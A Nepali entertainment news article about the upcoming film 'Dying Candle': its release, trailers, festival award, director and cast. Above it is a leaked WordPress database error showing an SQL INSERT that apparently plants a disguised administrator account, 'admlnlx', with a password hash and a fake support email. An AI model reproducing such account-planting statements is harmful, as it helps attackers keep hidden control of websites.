WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8kILpAM47DwVXrOgjKUA/SDp1LhaC0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 09:32:01', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १५ –
आगामी २८ गते रिलिज हुने सिनेमा डाइङ क्यान्डल धेरै दर्शकको प्रतिक्षाको सिनेमा हो । शनिबार सिनेमाको दुईवटा ट्रेलर र गीत सार्वजनिक गरिएको छ ।
हलिउडको क्वीन्स फेस्टिवलमा अवार्ड जितेपछि डाइङ क्यान्डलको चर्चा र अपेक्षा अझै बढेको छ । नरेश केसी निर्देशित यो सोसल ड्रामाले एक महिलाभित्रको मूल्य र संवेदना खोतल्ने प्रयत्न गरेको निर्माण युनिटले जनाएको छ । सिनेमामा सिर्जना सुब्बा, सौगात मल्ल र अर्पण थापाको अभिनय हेर्न पाइन्छ । ‘दीदी र भाइको आत्मीय सम्बन्धलाई चित्रण गरिएको छ । सिरियस दर्शकले फिल्म रुचाउनेछन्’ निर्देशक केसीले भने । फिल्मबाट रविन आचार्यले क्वीन्स फेस्टिभलमा छायांकन विधामा उपाधी जितेका थिए ।
सिनेमामा लाक्पा सिंगी तामाङ, विद्या कार्की र केशव राई समेत मुख्य भूमिकामा छन् । उत्तम केसी, रविन आचार्य र केसी निर्मित फिल्ममा डेल सम्नरको संगीत, भुपेन्द्र अधिकारीको सम्पादन छ ।